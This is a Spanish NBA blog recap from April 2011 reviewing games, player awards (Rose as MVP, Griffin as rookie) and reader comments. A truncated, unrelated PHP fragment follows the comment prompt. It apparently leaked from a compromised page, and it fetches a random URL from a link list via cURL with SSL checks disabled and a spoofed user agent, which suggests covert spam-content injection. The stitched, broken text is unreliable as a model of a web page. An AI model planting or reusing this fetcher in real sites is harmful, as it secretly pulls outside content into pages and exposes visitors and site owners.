La Crónica (02/04/2011)

03 de April de 2011 por TheDeerHunter

En la recta final empiezan a despejarse algunas incógnitas. Otras tendrán que esperar algunas jornadas más.

Los Bulls mantienen su pulso por el mejor balance de la liga. Rose mostró todo su repertorio para desatascar un duelo que resultó más difícil de la cuenta contra unos Raptors sin Calderon ni Bargnani.

Mavs y Thunder se borraron de cualquier persecución y comienzan a asumir las posiciones que finalmente les va a tocar. Los Mavs recordaron viejos y desagradables tiempos en la bahía de Oakland. Ellis y los Warriors se la liaron. Un partido flojo de Nowitzki, de Kidd en una alineación un tanto extraña de Carlisle. Con decir que el mejor fue Marion se dice todo. Por los Warriors a parte de Ellis destacaría la actuación de Thornton que muy de vez en vez todavía de muestras de seguir vivo.
A los Thunder se les empezó a ir el choque por culpa del desafortunado partido de Westbrook. Mal en el tiro, mal en la dirección con alguna pérdida excesivamente decisiva. Griffin se topó con su némesis, Ibaka, y aunque lo tuvo difícil salió bien parado. Durant tampoco estuvo especialmente bien y su equipo evidenció que aún puede tener problemas contra torres como DeAndré Jordan.

Inmenso triunfo de los Bucks que les mantiene en la pomada. Lo lograron en la prórroga ante Philadelphia, con Jennings recordando su mejor versión en ella y desequilibrando la balanza. Iguodala no se encontró a si mismo y el mejor de todo el choque fue Salmons.

Finalmente los Grizzlies se ponen séptimos en el Oeste gracias a su victoria ante los Wolves. Zach y Mayo los mejores.

MVP: Gran partido de Monta ajusticiando a los Mavericks. Sin embargo hoy Derrick Rose impone galones y con su bestial actuación ante Toronto nos recuerda quién ganará el premio este año. 36 puntos, 10 asistencias, 3 tapones, 3 rebotes y un robo, además de algunos de los highlights más impresionantes de la jornada.

El rookie: Ibaka le hizo desplegar lo mejor de si mismo. 26 puntos, 16 rebotes, 3 asistencias y dos robos para el gran rookie del año. Blake Griffin. También conviene destacar a Ed Davis por los Raptors con 17-11.

La sorpresa: Cada día resulta más difícil encontrar un buen partido suyo. Ayer Al Thornton resultó importante para su equipo con 12 puntos, 9 rebotes, 2 asistencias y 2 tapones. Otro ejemplo de la impresionante visión de los gestores de los Clippers en los Drafts.

La decepción: Algunos le nombraban con acierto hace unos días para futura super-estrella de la competición. Anoche Westbrook no lo fue, con un 1 de 12 en tiros y, aunque repartió 8 asistencias perdió 4 balones importantísimos y acabó expulsado por faltas. Descentradísimo.

El mayor esfuerzo en vano: El que más minutos disputó anoche, 47, fue Jrue Holiday. 15 puntos y 10 asistencias aunque no estuvo demasiado fino en el tiro.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Denise dice:
    #1

    De momento, los Spurs rompen su mala racha con un palizón a Phoenix, en un horrible partido del Big Three de los Spurs, pero ganado gracias a Hill y los triples de Bonner y Neal.
    Viendo ahora el Lakers-Nuggets, con un Kobe bastante chupón…..por ahora (2 de 8 en 6 minutos!!)

      Citar

  2. Denise dice:
    #2

    Y los Nuggets asaltan el Staples, Carmelo WHO?
    Los Lakers no han metido suficientes balones por dentro para Pau y Bynum, y su único juego ha sido el KobeSistema (el que otrora tanto se criticó a Mcmillan en su versión con Roy), y desde el primer minuto se veia que Kobe no tenia el dia bueno

      Citar

  3. Viva_Dirk dice:
    #3

    Que en algun partido surja el Kobesistema es natural, y no suele ser un gran problema para los Lakers a la larga.

      Citar

  4. Toni dice:
    #4

    Otro susto de la rodilla de Bynum… por el amor de dios Bynum, no la j—mos ahora.
    Si hubiera estado la pareja Bynum-Gasol los ultimos 5minutos, los lakers no hubieran perdido esta noche, lo doy por seguro.

    Esto sin quitar un apice de merito a los Nuggets que, a mi modo de ver, tienen una de las plantillas mas completas de la nba.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>